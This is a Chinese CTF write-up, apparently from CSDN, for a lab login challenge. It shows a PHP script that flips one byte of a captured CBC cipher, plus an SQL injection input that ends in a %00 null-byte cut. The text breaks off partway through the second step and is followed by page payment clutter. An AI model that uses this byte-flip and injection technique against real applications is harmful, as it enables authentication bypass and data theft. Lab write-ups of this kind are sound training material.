实验吧---简单的登陆题(CBC字节翻转攻击)

本文介绍了使用PHP重新实现CBC字节翻转攻击的过程,遇到的问题及解决方案,包括SQL注入、%00截断和Python编码问题的讨论。在实践中发现%00截断可能因PHP或MySQL的更新而失效,并解释了为何攻击时需要修改第6个字节而非第5个字节的原因。
摘要由CSDN通过智能技术生成

具体原理就不介绍了,百度上很多,直接放代码。因为用python3执行pcat大神的脚本出现很多语法和编码问题,所以打算用php脚本重写一遍攻击过程。

第一步:填写0 2nion select * from((select 1)a join (select * from you_want)b join (select 3)c);%00

提交后取得返回的cipher,替换php中的字符串,执行php文件,代码如下:

<?php 
$cipher_new = base64_decode(urldecode('E%2F2btd4lXULo0you%2FWrX2koJP%2BTE3geRjh0KCNQQ%2BIG54oHA5d3PDDejYyPIJgha49NuNN1A3GWbf7r9JiLun8reIPrsAjymZJFBNDnZYX8mw9Q6aFKKGWQTZxrlwNB04I9a%2FFnBGq1kpTcPtlLrwg%3D%3D'));//获得的cipher替换此处的字符串
$cipher_new[6]=$cipher_new[6]^'2'^'u';//CBC字节翻转攻击
$cipher_new = urlencode(base64_encode($cipher_new));//编码
printf("%s",$cipher_new);//输出,可以重定向到某个文件中,便于粘贴
?>

第二步,把从第一步得到的cipher_new填写到请求头中,替换原有的cipher,发起请求,获得plain,用第一步获得的iv和现在得到的plain替换php文件中的字符串,执行php文件,获得iv_new,代码如下:

&l
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值